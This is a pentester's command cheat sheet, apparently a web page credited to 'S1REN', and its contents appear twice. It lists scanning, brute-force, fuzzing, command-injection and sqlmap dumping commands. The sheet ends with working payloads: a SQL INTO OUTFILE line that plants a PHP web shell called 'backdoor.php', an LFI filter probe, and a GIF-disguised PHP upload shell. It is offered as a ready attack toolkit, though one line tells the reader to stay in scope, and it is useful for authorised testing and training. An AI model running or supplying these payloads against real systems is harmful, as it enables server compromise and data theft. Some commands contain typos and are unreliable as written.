Comman

This whole Sheet Is Taken By "S1REN"


===============================================
====nmap====
nmap -sT -sV -p- -T4 $IP > scan1
nmap -p- --script=vuln $IP > scan2
###HTTP-Methods
nmap --script http-methods --script-args http-methods.url-path='/website' <target>


===============================================
===WPScan & SSL
wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u 

===WPScan Brute Forceing:
wpscan --url $URL --disable-tls-checks -U users.txt -P /usr/share/wordlists/rockyou.txt


===============================================
===Nikto with SSL and Evasion
nikto --host $IP -ssl -evasion 1


===============================================
===dns_recon
dnsrecon -d yourdoamin.com


===============================================
===gobuster directory
gobuster dir -u $URL -w /opt/seclists/Discovery/Web-Content/raft-medium-directories.txt -l -k -t 30

===gobuster files
gobuster dir -u $URL -w /opt/seclists/Discovery/Web-Content/raft-medium-files.txt -l -k -t 30

===gobuster for SubDomain brute forcing:
gobuster dns -d domain.org -w /opt/seclists/Discovery/DNS/subdomains-top1million-0110000.txt -t 30
“just make sure any DNS name you find resolves to an in-scope address before you test it”


===============================================
===Extract IPs from a text files.
grep -o ‘[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}’ nmapfile.txt


===============================================
===wfuzz XSS Fuzzing===
wfuzz -c -z file,/usr/share/wordlits/Fuzzing/XSS.txt  “$URL”

===wfuzz
wfuzz -c -z file,/usr/share/worlists/Fuzzing/command-injection.txt -d “doi=FUZZ”  “$URL”

===wfuzz html_escape
wfuzz -c -z file,/usr/share/wordlists/Fuzzing/yeah.txt  “$URL”

===AUTHENTICATED FILE FUZZING:
wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/raft-midium-files.txt --hc 404 -d “PARAM=value”  “$URL”

===Fuzz Directories:
wfuzz -c -z fil,/opt/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 “$URL”

===Fuzz Files:
wfuzz -c -z fil,/opt/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 “$URL”
|
LARGE WORDS:
wfuzz -c -z file,/opt/seclists/Discovery/Web-content/raft-large-words.txt --hc 404 “$URL”
|
USERS:
wfuzz -c- z file,/opt/seclists/Usernames/top-usernames-shortlist.txt --hc 404,403 “$URL”



===============================================
===Command Injection with commix, ssl, waf, random agent.
commix --url “https://sepermegaleetultradomain.com?parameter=”  --level=3 --force-ssl --skip-waf --random-agent


===============================================
===SQL-Map 
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique-T --force-ssl
sqlmap -u $URL --threads=2 --time-sec=10 --level=4 --risk=3  --dump 
/seclists/Fuzzing/alphanum-case.txt


===============================================
===Social Recon
theharvester -d domain.org -l 500 -b google


===============================================
===Nmap HTTP-methods:
nmap -p80 --script=http-methods $IP --script-args http-methods.url-path='/directory/goes/here'


===============================================
===smtp USER ENUM
smtp-user-enum -M VRFY -U /opt/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /opt/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP

smtp-user-enum -M RCPT -U /opt/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP



===============================================

===Command Execution Verification - [Ping check]
tcpdump -i eth0 -c5 -icmp

===

#Check Network
netdiscover /r 0.0.0.0/24

===

#INTO OUTFILE D00R
SELECT “<?php system($_GET['cmd']); ?>” into outfile “/var/www/WEROOT/backdoor.php”;

===

LFI?
#PHP Filter Check
php://filter/convert.base64-encode/resources=

===

UPLOAD IMAGE?
GIF89a1
<?php system($_POST["cmd"]); ?>

Previousmy recon cheat-sheet NextPassive Enum

Last updated 2 years ago

=============================================== ====nmap==== nmap -sT -sV -p- -T4 $IP > scan1 nmap -p- --script=vuln $IP > scan2 ###HTTP-Methods nmap --script http-methods --script-args http-methods.url-path='/website' <target> =============================================== ===WPScan & SSL wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u ===WPScan Brute Forceing: wpscan --url $URL --disable-tls-checks -U users.txt -P /usr/share/wordlists/rockyou.txt =============================================== ===Nikto with SSL and Evasion nikto --host $IP -ssl -evasion 1 =============================================== ===dns_recon dnsrecon -d yourdoamin.com =============================================== ===gobuster directory gobuster dir -u $URL -w /opt/seclists/Discovery/Web-Content/raft-medium-directories.txt -l -k -t 30 ===gobuster files gobuster dir -u $URL -w /opt/seclists/Discovery/Web-Content/raft-medium-files.txt -l -k -t 30 ===gobuster for SubDomain brute forcing: gobuster dns -d domain.org -w /opt/seclists/Discovery/DNS/subdomains-top1million-0110000.txt -t 30 “just make sure any DNS name you find resolves to an in-scope address before you test it” =============================================== ===Extract IPs from a text files. grep -o ‘[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}’ nmapfile.txt =============================================== ===wfuzz XSS Fuzzing=== wfuzz -c -z file,/usr/share/wordlits/Fuzzing/XSS.txt “$URL” ===wfuzz wfuzz -c -z file,/usr/share/worlists/Fuzzing/command-injection.txt -d “doi=FUZZ” “$URL” ===wfuzz html_escape wfuzz -c -z file,/usr/share/wordlists/Fuzzing/yeah.txt “$URL” ===AUTHENTICATED FILE FUZZING: wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/raft-midium-files.txt --hc 404 -d “PARAM=value” “$URL” ===Fuzz Directories: wfuzz -c -z fil,/opt/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 “$URL” ===Fuzz Files: wfuzz -c -z fil,/opt/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 “$URL” | LARGE WORDS: wfuzz -c -z file,/opt/seclists/Discovery/Web-content/raft-large-words.txt --hc 404 “$URL” | USERS: wfuzz -c- z file,/opt/seclists/Usernames/top-usernames-shortlist.txt --hc 404,403 “$URL” =============================================== ===Command Injection with commix, ssl, waf, random agent. commix --url “https://sepermegaleetultradomain.com?parameter=” --level=3 --force-ssl --skip-waf --random-agent =============================================== ===SQL-Map sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique-T --force-ssl sqlmap -u $URL --threads=2 --time-sec=10 --level=4 --risk=3 --dump /seclists/Fuzzing/alphanum-case.txt =============================================== ===Social Recon theharvester -d domain.org -l 500 -b google =============================================== ===Nmap HTTP-methods: nmap -p80 --script=http-methods $IP --script-args http-methods.url-path='/directory/goes/here' =============================================== ===smtp USER ENUM smtp-user-enum -M VRFY -U /opt/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP smtp-user-enum -M EXPN -U /opt/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP smtp-user-enum -M RCPT -U /opt/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP =============================================== ===Command Execution Verification - [Ping check] tcpdump -i eth0 -c5 -icmp === #Check Network netdiscover /r 0.0.0.0/24 === #INTO OUTFILE D00R SELECT “<?php system($_GET['cmd']); ?>” into outfile “/var/www/WEROOT/backdoor.php”; === LFI? #PHP Filter Check php://filter/convert.base64-encode/resources= === UPLOAD IMAGE? GIF89a1 <?php system($_POST["cmd"]); ?>